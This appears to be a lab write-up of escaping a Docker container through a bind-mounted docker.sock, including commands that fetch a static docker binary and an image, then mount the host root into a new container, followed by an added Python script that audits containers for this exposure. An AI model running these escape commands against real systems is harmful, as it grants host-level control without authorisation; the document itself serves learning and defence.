Environment setup

  • A local Ubuntu virtual machine

  • Pull the image, start the container, and bind-mount docker.sock into it

docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu
  • Next you run into this error

root@ubuntu20:/# docker run -itd --name with_docker_sock -v /var/run/docker.sock:/var/run/docker.sock ubuntu
Unable to find image 'ubuntu:latest' locally
docker: Error response from daemon: Get "https://registry-1.docker.io/v2/": proxyconnect tcp: dial tcp x.x.x.x:7897: connect: connection refused.
See 'docker run --help'.
  • Configure a proxy for the docker daemon and the image pulls normally

sudo mkdir -p /etc/systemd/system/docker.service.d
sudo touch /etc/systemd/system/docker.service.d/http-proxy.conf
sudo vim /etc/systemd/system/docker.service.d/http-proxy.conf

[Service]
Environment="HTTP_PROXY=socks5://x.x.x.x:7897" "HTTPS_PROXY=socks5://x.x.x.x:7897" "NO_PROXY=localhost,127.0.0.1,docker-registry.somecorporation.com"

sudo systemctl daemon-reload
sudo systemctl restart docker
systemctl show --property=Environment docker
  • To keep simulating the mainland-China network situation, turn the proxy off again once the container is running

Container environment

  • Look up the container id

root@ubuntu20:~# docker ps 
CONTAINER ID   IMAGE     COMMAND       CREATED          STATUS          PORTS     NAMES
a5b4b354102c   ubuntu    "/bin/bash"   22 minutes ago   Up 22 minutes             with_docker_sock
  • Enter the container

docker exec -it a5b4b354102c /bin/bash

Escape

  • Locate the docker.sock file

find / -name docker.sock
  • Once it is found, escape by mounting the host filesystem

  • There is no docker command inside the container, so download the static docker binary; after extracting it, it can be run directly

  • There is no download tool either: run apt update, then apt install curl

curl https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -o /tmp/docker.tgz

  • To keep the two containers distinct, pull a different Linux image for the escape; the pull fails (the proxy is off now)

/tmp/docker/docker -H unix:///run/docker.sock run -v /:/mnt -it alpine  sh

Export the docker image

  • Find a server that can pull images normally

  • Pull the image and export it

docker pull alpine

docker save -o alpine_latest.tar alpine:latest

Import the image and escape

  • Run the following inside the container you are escaping from

  • Download the prepared image

curl http://192.168.x.x:8000/alpine_latest.tar -o /tmp/alpine_latest.tar
/tmp/docker/docker load -i /tmp/alpine_latest.tar 
/tmp/docker/docker -H unix:///run/docker.sock run -v /:/mnt -it alpine  sh

  • Escape succeeded
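From the host's side, the configuration this whole lab depends on is a single bind mount of the daemon socket, which hands the container root-equivalent control of the host. The following is an added example, not part of the original write-up: a Python audit over `docker inspect` JSON that flags containers with the socket mounted (under either of its usual paths) or running privileged. It assumes the `Mounts` and `HostConfig.Privileged` fields of `docker inspect` output; the sample data is constructed.

```python
import json
import posixpath

# Host paths under which the Docker daemon socket is normally exposed. On most
# distributions /var/run is a symlink to /run, so both spellings name the same
# socket (which is why `find / -name docker.sock` above reports /run/docker.sock).
DOCKER_SOCKET_PATHS = {"/var/run/docker.sock", "/run/docker.sock"}


def socket_mounts(container):
    """Return host-side sources of bind mounts that expose the daemon socket."""
    found = []
    for mount in container.get("Mounts", []):
        src = mount.get("Source", "")
        # normpath collapses "//", "/./" and trailing slashes so aliases compare equal.
        if mount.get("Type") == "bind" and posixpath.normpath(src) in DOCKER_SOCKET_PATHS:
            found.append(src)
    return found


def audit_containers(inspect_json):
    """Parse `docker inspect $(docker ps -q)` output and flag containers that can reach the host."""
    findings = []
    for c in json.loads(inspect_json):
        reasons = []
        socks = socket_mounts(c)
        if socks:
            reasons.append("docker socket mounted from " + ", ".join(socks))
        if c.get("HostConfig", {}).get("Privileged"):
            reasons.append("privileged container")
        if reasons:
            findings.append({"id": c["Id"][:12], "name": c.get("Name", "").lstrip("/"),
                             "reasons": reasons})
    return findings


# Constructed sample in the shape of `docker inspect` output: the lab container from
# the write-up (id a5b4b354102c) plus a benign one. Not real captured data.
SAMPLE_INSPECT = json.dumps([
    {"Id": "a5b4b354102c" + "0" * 52, "Name": "/with_docker_sock",
     "HostConfig": {"Privileged": False, "Binds": ["/var/run/docker.sock:/var/run/docker.sock"]},
     "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                 "Destination": "/var/run/docker.sock"}]},
    {"Id": "b" * 64, "Name": "/web", "HostConfig": {"Privileged": False, "Binds": None},
     "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/web/_data",
                 "Destination": "/data"}]},
])
```

Against a live host, feed it `subprocess.check_output(["docker", "inspect"] + ids)` where `ids` comes from `docker ps -q`; any finding is a container that should be treated as having host root.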